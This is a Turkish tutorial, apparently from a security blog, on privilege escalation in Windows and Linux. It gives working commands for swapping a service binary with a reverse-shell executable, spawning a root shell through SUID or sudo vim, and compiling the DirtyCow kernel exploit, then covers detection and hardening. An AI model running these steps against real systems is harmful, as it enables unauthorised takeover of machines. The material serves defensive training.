1. Giriş

Bir siber saldırı genellikle tek bir adımda gerçekleşmez. Saldırgan, sisteme ilk giriş yaptığında çoğunlukla düşük ayrıcalıklı kullanıcı yetkilerine sahip olur. Ancak gerçek hedef, root (Linux) veya Administrator/SYSTEM (Windows) yetkilerine ulaşmaktır. Bu sürece Privilege Escalation (Ayrıcalık Yükseltme) denir.

Saldırgan için: Sistemin tamamını kontrol etmek.
Savunmacı için: Bu yükselme yollarını kapatmak ve tespit etmek.


2. Privilege Escalation Türleri

  • Local Privilege Escalation (LPE): Sisteme erişim zaten vardır, fakat daha yüksek yetkilere çıkılır.
  • Remote Privilege Escalation (RPE): Uzaktan, genellikle exploit yoluyla doğrudan yüksek yetkiler elde edilir.
  • Vertical Escalation: Kullanıcı → Admin geçişi.
  • Horizontal Escalation: Aynı seviyede başka bir kullanıcı hesabına geçiş.

3. Laboratuvar Ortamı Kurulumu

Kendi deneme ortamınızı kurarak bu teknikleri güvenli bir şekilde test edebilirsiniz:

  • Linux: Ubuntu/Debian (zayıf sudoers ayarları ile).
  • Windows: Windows 10 / Windows Server (test amaçlı VM).
  • Araçlar:
    • Linux için: linpeas.sh, linenum.sh, pspy
    • Windows için: winPEAS.exe, PowerUp.ps1
    • Ek olarak: Metasploit, Sysinternals Suite, auditd

4. Windows Privilege Escalation Teknikleri

4.1 Misconfigured Services

# Servis bilgilerini kontrol et
sc qc VulnerableService

# Servisin binary path'ine yazma yetkisi var mı kontrol et
icacls "C:\Program Files\VulnApp\service.exe"

Eğer normal kullanıcı Modify iznine sahipse, dosyayı zararlı exe ile değiştirip servisi yeniden başlatabilir:

sc stop VulnerableService
copy C:\Malware\reverse.exe "C:\Program Files\VulnApp\service.exe"
sc start VulnerableService


4.2 Unquoted Service Path

# Servis yolu kontrolü
sc qc UnquotedService

Çıktı:

BINARY_PATH_NAME: C:\Program Files\Vulnerable Service\app.exe

Saldırgan C:\Program.exe dosyası koyarsa, servis çalışırken önce bu dosya çalışır.


4.3 Registry Exploitation

# Registry izinlerini kontrol et
reg query HKLM\System\CurrentControlSet\Services\VulnService


4.4 Scheduled Tasks Manipulation

# Tüm görevleri listele
schtasks /query /fo LIST /v

Görev Administrator olarak çalışıyor ama herkesin yazma hakkı varsa → zararlı komut eklenebilir.


5. Linux Privilege Escalation Teknikleri

5.1 SUID Bit Abuse

# SUID dosyalarını bul
find / -perm -4000 -type f 2>/dev/null

Örnek:

vim -c ':!sh'


5.2 Weak Sudoers Config

sudo -l

Örnek çıktı:

User hacker may run the following commands:
    (ALL) NOPASSWD: /usr/bin/vim

sudo vim -c ':!sh'


5.3 Kernel Exploits

uname -a

Çıktı:

Linux vulnbox 4.4.0-21-generic

DirtyCow exploit örneği:

gcc dirtycow.c -o dirtycow -pthread
./dirtycow


5.4 World-Writable Files

find / -writable -type f 2>/dev/null


6. Otomatik Araçlarla Tespit

  • Linux:
./linpeas.sh
./linenum.sh

  • Windows:
winPEAS.exe
Import-Module .\PowerUp.ps1
Invoke-AllChecks


7. Gerçek Senaryo (Case Study)

  1. Normal kullanıcı olarak sisteme giriş.
  2. sudo -l ile zayıf sudoers tespiti.
  3. sudo vim -c ':!sh' ile root shell elde etme.

8. Detection & Monitoring

Linux – auditd kuralı:

auditctl -a always,exit -F arch=b64 -S execve

Windows – Sysmon ile izleme:
Servis, registry ve scheduled tasks değişikliklerini loglamak için özel konfig kullanılabilir.


9. Önleme & Best Practices

  • Least Privilege prensibi uygulayın.
  • Kernel ve uygulamaları güncel tutun.
  • SUID dosyalarını kaldırın:
chmod u-s /usr/bin/vim

  • Servis yollarını tırnak içine alın.
  • SIEM üzerinde korelasyon kuralları yazın.

10. Sonuç

Privilege Escalation, saldırganın sistem üzerinde tam kontrol kazanmasını sağlar. Güvenlik ekipleri için bu adımı anlamak ve önlem almak kritik önemdedir.

Bu makaledeki adımları sadece test laboratuvarınızda uygulayarak saldırı yollarını öğrenebilir ve kendi sistemlerinizi güçlendirebilirsiniz.

Yorum bırakın

Popüler